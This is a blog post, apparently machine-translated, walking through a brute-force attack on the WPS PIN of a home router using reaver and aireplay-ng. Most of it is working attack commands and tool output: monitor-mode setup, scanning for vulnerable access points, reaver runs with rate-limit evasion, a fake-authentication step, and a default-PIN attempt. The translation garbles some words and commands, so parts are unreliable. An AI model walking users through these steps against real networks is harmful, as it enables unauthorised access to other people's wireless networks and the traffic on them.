Today we are going to talk about reaver used to carry out attacks against WPS (wifi protected setup). First of all a small reminder of the facts, reaver is a tool created to test the security of wireless networks equipped with WPS. And simple, it is to test by bruteforce the 8 digit PIN code used by the router in order to find the famous WPA key used to protect the network. At the time, it was a bit like going to a park Attraction without having paid the entrance because many routers were vulnerable to this attack.
<unk>
Yes but ... since its release the access points have also evolved and most of the attacks fail so far.Readyto test? <unk>
The WPS works under the following principle, the PIN code consists of 8 digits, so you're going to tell me 8 digits that makes a lot of possibilities to test ... actually not really when you know that the eighth digit and the control of the other 7 .Otherwise, we do not need to try all the possibilities because the PIN code is done hara-kiri alone <unk>
Let us take the example with the following code: 34536896 we decompose 3x3 + 1x4 + 3x5 + 1x3 + 3x6 + 1x8 + 3x9 + 1x6 = 90, once we have applied the modulo 10 we get 0 because we removed 9 × 10 . Knowing how a pin is composed at the base can significantly reduce the number of tests, which gives a very fast attack on a vulnerable router. The reverse engineering has more than proved in the field with the generation of pine for D-link, TP-Link .. and so on.
What about our boxes? It comes <unk>
Test configuration: a 9box from sfr and a computer under kali-linux with a wifi card alfa AWUS036H - >> equipped with a driver type RT8187L I strongly recommend this material for your tests.
-1 the basics
Launch the card in monitor and sniffing mode of the surrounding wifi networks and start the test.
Ps: I recommend stoper network-manager before to avoid conflicts
In a terminal launch:
Airmon-ng start wlan0
Wash -i mon0
It will display potentially vulnerable networks, check that the column "WPS locked" is at zero, now come the command of reaver, the great classic that made all the rage.
Reaver -i mon0 -c 1 -b 00: 11: 22: 33: 44: 55 -vv
But let's be serious ... nowadays this command has little chance of functioning. If we want to have a chance we will prefer to use other commands, example:
Reaver -i mono-b 30: 7E: CB: AE: A3: 44 -a -v -c 6 -r 1:60 -L -S
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
[+] Switching mon0 to channel 6
[?] Restore previous session for 30: 7E: CB: AE: A3: 44? [N / Y] n
[+] Waiting for beacon from 30: 7E: CB: AE: A3: 44
[+] Associated with 30: 7E: CB: AE: A3: 44 (ESSID: SFR_A340)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
One notices the immediate failure of the attack because of a "timeout", how to pass this stage?
With aireplay-ng simply <unk>
Aireplay-ng -1 120 -a 30: 7E: CB: AE: A3: 44 -e SFR_A340 -h 00: C0: CA: 75: 88: 87 --ignore-negative-one mon0
One sees immediately the difference in the reaver console.
<unk>
The attack continues according to the parameters of the command, besides come:
Reaver -i mono -c 6 -A-b 30: 7E: CB: AE: A3: 44 -vv -N -t 5 -L -r 1:60 -S
The main option to remember is here -r 1:60 which means to take a break of 60 seconds by PIN, it seems a lot but on some AP it must be that.Evidement you can modify that at your discretion.Slowly but more efficiently, Reaver continues shmiclblick.
[+] Entering recurring delay of 60 seconds
[+] Trying pin 22225672
Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] 0.05% complete @ 2015-02-15 00:06:30 (86 seconds / pin)
[+] Max time remaining at this rate: 262: 39: 30 (10995 pins left to try)
[+] Entering recurring delay of 60 seconds
[+] Trying pine 33335674
Knowing correctly that my ninebox has no PIN in parameter I stop the attack, now let's see an attempt with the WPS activated by default and reaver knowing the default PIN of the box.
Reaver-i mono -c 6 -A -b 30: 7E: CB: AE: A3: 44 -vv -p 6319308
No comments:
Post a Comment